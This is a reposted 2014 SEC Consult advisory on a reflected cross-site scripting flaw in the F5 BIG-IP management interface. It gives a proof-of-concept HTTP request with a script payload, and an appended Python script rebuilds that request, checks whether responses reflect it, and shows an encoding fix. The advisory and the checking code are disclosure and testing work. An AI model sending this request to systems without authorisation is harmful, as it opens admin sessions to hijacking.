F5 BIG-IP 11.5.1 Cross Site Scripting

Source: packetstormsecurity.com (PACKETSTORM:128034)
Author: S. Viehbock
Published: Aug 28, 2014
EPSS: 0.002 (percentile 60.8%)

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
SEC Consult Vulnerability Lab Security Advisory < 20140828-0 >  
=======================================================================  
title: Reflected Cross-Site Scripting  
product: F5 BIG-IP  
vulnerable version: <= 11.5.1  
fixed version: > 11.6.0  
impact: Medium  
CVE number: CVE-2014-4023  
homepage: https://f5.com/  
found: 2014-07-07  
by: Stefan Viehböck  
SEC Consult Vulnerability Lab  
https://www.sec-consult.com  
=======================================================================  
  
Vendor/product description:  
- -----------------------------  
"The BIG-IP product suite is a system of application delivery services that  
work together on the same best-in-class hardware platform or software virtual  
instance. From load balancing and service offloading to acceleration and  
security, the BIG-IP system delivers agility—and ensures your applications  
are fast, secure, and available."  
  
URL: https://f5.com/products/big-ip  
  
  
Vulnerability overview/description:  
- -----------------------------------  
BIG-IP suffers from a reflected Cross-Site Scripting vulnerability,  
which allows an attacker to steal other users' sessions, to impersonate other  
users and to gain unauthorized access to the admin interface.  
  
  
Proof of concept:  
- -----------------  
The following HTTP request triggers the vulnerability:  
  
POST /tmui/dashboard/echo.jsp HTTP/1.1  
Host: BIGIP  
Cookie: BIGIPAuthCookie=*VALID_COOKIE*  
Content-Length: 29  
  
<script>alert('xss')</script>  
  
The server does not properly encode user supplied information and returns it  
to the user resulting in Cross-Site Scripting.  
  
  
Vulnerable / tested versions:  
- -----------------------------  
More information can be found at:  
https://support.f5.com/kb/en-us/solutions/public/15000/500/sol15532.html  
  
  
Vendor contact timeline:  
- ------------------------  
2014-07-08: Sending advisory and proof of concept exploit via encrypted  
channel.  
2014-07-09: Vendor confirms receipt of advisory. States that fix will be  
released in the "next 6 weeks or so"  
2014-07-24: Vendor provides CVE: CVE-2014-4023  
2014-08-26: Vendor releases fixed version.  
2014-08-28: SEC Consult releases a coordinated security advisory.  
  
  
Solution:  
- ---------  
Update to the newest version.  
  
More information can be found at:  
https://support.f5.com/kb/en-us/solutions/public/15000/500/sol15532.html  
  
  
Workaround:  
- -----------  
No workaround available.  
  
  
Advisory URL:  
- -------------  
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
SEC Consult Vulnerability Lab  
  
SEC Consult  
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius  
  
Headquarter:  
Mooslackengasse 17, 1190 Vienna, Austria  
Phone: +43 1 8903043 0  
Fax: +43 1 8903043 15  
  
Mail: research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult  
  
Interested in working with the experts of SEC Consult?  
Write to [email protected]  
  
EOF Stefan Viehböck / @2014  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.9 (MingW32)  
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/  
  
iQEcBAEBAgAGBQJT/wVOAAoJECyFJyAEdlkKq9cIAKX9MEOpw8p9i8KWZXmkBiBr  
S3n9YPNk6bbGbm+YfNCvXvtdSTPhh4I1wBY/WYWENpnQrwdiJ3couS5f2/DQzHTP  
uCROxpmtxY1bokMS+ZHOPeGECk8RFr03kBZtGrF2cdGLWzBv7l+CnmopS8lnDVsw  
44/R5hj3OdZxhD3btFLXss1RPbUDU1vGV9KpDgJmsssS5pzvG9I2T9xGibd0zBIA  
WGA5jjGFitfQwDaxvqoocKgmBG2o3nQpdCShlaRiFklVJQYT1J+w/TWA1OOWZmxs  
91m6C9fqAqgeIjmFSOE5c/rpiw7MdzH46yUzoVhbqm6wKcngLDDmZDuqPwaqH18=  
=RsbU  
-----END PGP SIGNATURE-----  
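Verifying the echo.jsp reflection described in the advisory's proof of concept, as an added example that is not part of the SEC Consult advisory or of any F5 code: the block rebuilds the advisory's raw POST (deriving Content-Length from the body, which confirms the advisory's value of 29), classifies a response as reflected raw, reflected HTML-entity-encoded, or not reflected, and shows the generic output-encoding fix for this bug class. The host, cookie value and both sample responses are constructed placeholders; `safe_echo` is an illustrative hardened handler, not F5's patch. Two caveats a tester should keep in mind: the request only works with a valid `BIGIPAuthCookie`, so the victim is an already authenticated TMUI user and the script runs in the management interface's origin, and a "not_reflected" verdict means the payload was filtered or blocked, which is not the same as it being encoded.

```python
"""Added example (not part of the SEC Consult advisory or any F5 code):
the reflection check a tester runs against /tmui/dashboard/echo.jsp before
and after an upgrade, using constructed responses so it runs offline."""
import html

# Payload from the advisory's proof of concept.
PAYLOAD = "<script>alert('xss')</script>"


def build_poc_request(host: str, auth_cookie: str, payload: str = PAYLOAD) -> bytes:
    """Rebuild the advisory's raw POST, computing Content-Length from the body.

    The body is sent exactly as in the advisory (no Content-Type header).
    `host` and `auth_cookie` are placeholders supplied by the caller.
    """
    body = payload.encode("utf-8")
    head = (
        "POST /tmui/dashboard/echo.jsp HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Cookie: BIGIPAuthCookie={auth_cookie}\r\n"
        f"Content-Length: {len(body)}\r\n"
        "\r\n"
    )
    return head.encode("utf-8") + body


def classify_reflection(response_body: str, payload: str = PAYLOAD) -> str:
    """Return 'vulnerable', 'encoded' or 'not_reflected'.

    'vulnerable': the payload comes back byte-for-byte, so a browser parses it
    as markup. 'encoded': only an HTML-entity-escaped copy comes back, which is
    what a correct output-encoding fix produces ('&#x27;' and '&#39;' are both
    accepted for the apostrophe). 'not_reflected': the input was dropped or
    blocked, which is a filter, not proof of a fix; retest with other payloads.
    """
    if payload in response_body:
        return "vulnerable"
    full = html.escape(payload, quote=True)
    escaped_variants = {
        full,                                   # &lt;...alert(&#x27;xss&#x27;)...
        full.replace("&#x27;", "&#39;"),        # decimal entity for the quote
        html.escape(payload, quote=False),      # tags escaped, quotes untouched
    }
    if any(v in response_body for v in escaped_variants):
        return "encoded"
    return "not_reflected"


def safe_echo(user_input: str) -> str:
    """Hardened echo: HTML-entity-encode input placed in an HTML text node.

    Generic fix for the bug class the advisory describes, not F5's patch.
    The encoder must match the output context; this one is for body text.
    """
    return f"<pre>{html.escape(user_input, quote=True)}</pre>"


# Constructed sample responses (not captured from a real BIG-IP).
VULNERABLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
    f"<html><body><pre>{PAYLOAD}</pre></body></html>"
)
FIXED_RESPONSE = (
    "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
    f"<html><body>{safe_echo(PAYLOAD)}</body></html>"
)


def response_body(raw: str) -> str:
    """Split a raw HTTP response string into headers and body; return the body."""
    return raw.split("\r\n\r\n", 1)[1]


if __name__ == "__main__":
    print(build_poc_request("BIGIP", "*VALID_COOKIE*").decode())
    print("unpatched:", classify_reflection(response_body(VULNERABLE_RESPONSE)))
    print("patched:  ", classify_reflection(response_body(FIXED_RESPONSE)))
```

Against a live unit, send the bytes from `build_poc_request` over TLS to the management address with a real session cookie and feed the response body to `classify_reflection`; only an "encoded" verdict confirms output encoding, since a filter that merely strips `<script>` also yields "not_reflected".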
